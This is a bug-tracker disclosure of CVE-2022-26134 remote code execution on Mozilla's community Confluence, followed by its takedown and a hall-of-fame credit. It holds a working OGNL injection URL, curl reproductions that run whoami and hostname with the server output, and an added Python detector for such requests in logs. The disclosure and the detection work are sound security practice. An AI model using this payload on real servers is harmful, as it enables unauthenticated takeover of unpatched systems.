RCE on confluence.mozilla-community.org (CVE-2022-26134)
Categories: Participation Infrastructure :: MCWS, defect
Tracking: Not tracked
People: Reporter: nonsleepr, Unassigned
Keywords: reporter-external, sec-critical, wsec-injection
Attachments: 1 file (image/png, 136.12 KB)
Steps to reproduce:
The Confluence website can be exploited without authentication. For example, the following request would execute whoami and return the results in the X-Cmd-Response header:
https://confluence.mozilla-community.org/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
Actual results:
The website executed the shell command and returned the results in the X-Cmd-Response header.
Expected results:
No command execution should happen.
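As an added example (not part of the report or of any Mozilla tooling), the following detector shows how a defender would spot this kind of request in web-server logs: it parses constructed nginx access-log lines, percent-decodes the request path repeatedly so that a double-encoded request normalises the same way as a single-encoded one, and flags any path that decodes to an OGNL ${...} expression like the one in the request above. All IPs, paths and log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed nginx access-log lines (not from the original report). Line 2 carries a
# percent-encoded ${...} expression in the path as the report's PoC does, line 3 the same
# kind of expression double-encoded, line 4 a harmless ${ that sits only in the query string.
SAMPLE_LOG = """\
203.0.113.10 - - [04/Jun/2022:09:27:17 +0000] "GET /display/HOME/Welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [04/Jun/2022:09:27:18 +0000] "GET /%24%7B%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"
203.0.113.12 - - [04/Jun/2022:09:28:16 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529%257D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"
203.0.113.13 - - [04/Jun/2022:09:29:00 +0000] "GET /pages/viewpage.action?pageId=%24%7B1%7D HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
OGNL_RE = re.compile(r'\$\{.+\}')  # an OGNL expression delimited by ${ ... }

def fully_decode(s, rounds=3):
    """Percent-decode until stable, so %2524 -> %24 -> $ normalises like a single-encoded request."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def is_ognl_injection(target):
    """True when the URI path (query string excluded, since the PoC places the expression in
    the path) decodes to something containing a ${...} expression. Confluence's own URLs never
    carry a literal ${...} in the path, so this is a low-noise indicator of CVE-2022-26134 probing."""
    path = target.split("?", 1)[0]
    return OGNL_RE.search(fully_decode(path)) is not None

def detect_ognl_requests(log_text):
    """Return (client_ip, decoded_path) for every request line carrying an OGNL expression.
    Detection keys on the request: the X-Cmd-Response header seen in the report is a name the
    sender chose, so matching on response headers would miss any variant that uses another."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_ognl_injection(m.group("target")):
            path = fully_decode(m.group("target").split("?", 1)[0])
            hits.append((m.group("ip"), path))
    return hits
```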
Comment 3•3 years ago
Hello,
Thank you for your report.
I can confirm that the commands are being executed, using the whoami command:
% curl -I "https://confluence.mozilla-community.org/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
HTTP/1.1 302
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 04 Jun 2022 09:27:17 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-ASEN: SEN-5034594
X-Confluence-Request-Time: 1654334837340
Set-Cookie: JSESSIONID=95B685A40E8C0BB5B61B581E1FE4AAA4; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Response: confluence
and using the hostname command:
% curl -I "https://confluence.mozilla-community.org/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22hostname%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
HTTP/1.1 302
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 04 Jun 2022 09:28:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-ASEN: SEN-5034594
X-Confluence-Request-Time: 1654334896559
Set-Cookie: JSESSIONID=BEDD534D535FE3690008280AF0C1FE7F; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Response: ip-172-31-7-75
I am trying to track down the owner of this instance.
Thanks,
Frida
Comment 5•3 years ago
The community Confluence instance was taken down since it is not being used and was only setup as a demo.
Thanks again for reporting this issue.
Thanks,
Frida
Comment 7•3 years ago
Hello,
We decided to award hall of fame mention to this report on our website, https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/, please let us know how you would like to be mentioned.
Thanks again for your report.
Thanks,
Frida
Hello,
Yes please. I'd be happy to be mentioned as Alexander Bessonov with the link to my Twitter account (@nonsleepr).
Thanks.